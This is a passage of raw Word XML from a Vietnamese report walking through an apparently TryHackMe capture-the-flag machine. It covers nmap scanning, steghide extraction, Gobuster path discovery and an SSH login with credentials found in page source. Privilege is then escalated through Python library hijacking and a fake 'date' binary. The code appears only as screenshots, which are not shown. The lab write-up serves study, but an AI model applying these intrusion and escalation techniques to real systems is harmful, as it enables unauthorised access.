      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F4C99" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:hanging="153"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hệ điều hành Kali linux để tận dụng các công cụ hỗ trợ sẵn có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A5076" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:hanging="153"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để quét máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BDB8A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 Công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>steghide</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để giải nén ảnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760B25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 Công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để quét các đường dẫn khác trên máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6496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file sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ell </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để phân tích máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B1583" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA" w:rsidP="00B53014">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc90050788"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.2. Các bước thực hiện</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="5A5530A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ích hoạt máy chủ trên Tryhackme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113896C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ịa chỉ ip: 10.10.252.144. Gán vào biến tạm IP để sử dụng sau này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FDA39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3ECF9D69" wp14:editId="3DD6886E">
            <wp:extent cx="5115639" cy="762106"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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115639" cy="762106"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1779BA6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Tiến hành quét địa chỉ này bằng lệnh: nmap -sC -sV -vv $IP. Quan sát thấy port 22 đang mở, có thể dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F03C5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6A3CC225" wp14:editId="37F0EBA5">
            <wp:extent cx="5212080" cy="3749040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5212080" cy="3749040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="224776F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Quan sát trên trang web, chỉ có dữ kiện duy nhất là hình ảnh, tiến hành down hình ảnh này về máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB1B9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0" distB="0" distL="0" distR="0" wp14:anchorId="308CE97E" wp14:editId="28E6445E">
            <wp:extent cx="6120765" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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6120765" cy="2641600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E95D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Phân tích sơ lược, thấy có 3 component trong ảnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED67FF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24D98977" wp14:editId="487B605D">
            <wp:extent cx="5172797" cy="1476581"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5172797" cy="1476581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F7148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Ta tiến hành giải nén ảnh ra bằng công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>steghide</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, tìm thấy file ẩn hint.txt, mở file ra xem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC158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402CAA39" wp14:editId="0C8B2FC4">
            <wp:extent cx="5210902" cy="1238423"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5210902" cy="1238423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4033A22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Dùng công cụ Gobuster để quét các đường dẫn khác trên máy chủ 10.10.252.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFB90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0" distB="0" distL="0" distR="0" wp14:anchorId="52B42AA0" wp14:editId="64D40D58">
            <wp:extent cx="4422605" cy="3198636"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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4422605" cy="3198636"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC9669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hi phân tích tìm được 2 kết quả /img và /r, để ý thấy dòng chữ tìm được ở trên và đường dẫn mới tìm được. Ta thử dò xét đường dẫn /r/a/b/b/i/t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571285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3610E547" wp14:editId="41389562">
            <wp:extent cx="5220429" cy="914528"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5220429" cy="914528"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71254CB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32C79A1B" wp14:editId="2E6FDEEB">
            <wp:extent cx="5324204" cy="2185988"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5324204" cy="2185988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD3B1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iến hành xem source của web, ta tìm được 1 đoạn text ẩn, có thể đây là một cấu trúc username:password, tiến hành lưu lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D17C3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0" distB="0" distL="0" distR="0" wp14:anchorId="14C7A06F" wp14:editId="49628B9B">
            <wp:extent cx="5312131" cy="2024063"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5312131" cy="2024063"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6696F1B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ết hợp với dữ kiện ban đầu là cổng 22 đang mở, ta thử dùng tên đăng nhập alice và password tìm được để truy cập vào bằng ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C2F77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64928582" wp14:editId="6418C203">
            <wp:extent cx="5287113" cy="1428949"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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5287113" cy="1428949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CFDE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Kết quả là truy cập được vào user </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">alice, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>thử kiểm tra xem các file mà alice chứa. có 2 file root.txt và walrus_and_the_carpenter.py. Với root.txt ta không cso quyền truy cập, vì vậy cần phải lên quyền cao hơn. Tiến hành xem file còn lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC5670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24D7DB9C" wp14:editId="0810C671">
            <wp:extent cx="4725059" cy="1009791"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4725059" cy="1009791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F394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File này là một chương trình python được import một thư viện, ở đây ta có thể tiến hành pypass thư viện này để có thể tận dụng chiếm quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D157E0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0" distB="0" distL="0" distR="0" wp14:anchorId="06999D91" wp14:editId="4E3E8636">
            <wp:extent cx="5058481" cy="3010320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5058481" cy="3010320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90007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ạo file random.py với nội dung như hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6FE5F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4FAFAAD8" wp14:editId="213A0985">
            <wp:extent cx="5048955" cy="3677163"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5048955" cy="3677163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED55EA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Xem thông tin quyền của alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9C785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4A8C001E" wp14:editId="77ED5FB4">
            <wp:extent cx="5191850" cy="1267002"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191850" cy="1267002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC2903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Thực hiện lệnh, ta đã lên được quyền của rabbit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4623F86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687D704D" wp14:editId="2F4A3A2D">
            <wp:extent cx="5201376" cy="495369"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5201376" cy="495369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE7B5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Xem cái file mà user rabbit chứa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF6BB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4DA6A205" wp14:editId="0CA27336">
            <wp:extent cx="5163271" cy="1800476"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5163271" cy="1800476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564FA1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4F2A867A" wp14:editId="2D75E870">
            <wp:extent cx="4915586" cy="1247949"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4915586" cy="1247949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC1D4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iến hành xem code của file teaParty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705AFD9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1F62DCAB" wp14:editId="2EB846A4">
            <wp:extent cx="5077534" cy="3477110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5077534" cy="3477110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC02FF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Để ý thấy date là một thư viện được sử dung, ta tiếp tục tạo 1 file </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">date </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ypass code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FC54D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0" distB="0" distL="0" distR="0" wp14:anchorId="6E7AD618" wp14:editId="797452B9">
            <wp:extent cx="5115639" cy="3696216"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5115639" cy="3696216"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50AF86" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Bắt đầu chạy file </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>teaParty</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, ta đã lên được user </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hatter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A909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7E9674B8" wp14:editId="6D08BE3D">
            <wp:extent cx="5134692" cy="3134162"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5134692" cy="3134162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40396E8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Tiếp tục xem thông tin trên </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hatter</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, ta tìm được 1 file chứa password, có thể đây là password của </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hatter</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76523F6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0" distB="0" distL="0" distR="0" wp14:anchorId="03770CB2" wp14:editId="092EB6C0">
            <wp:extent cx="5134692" cy="1714739"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
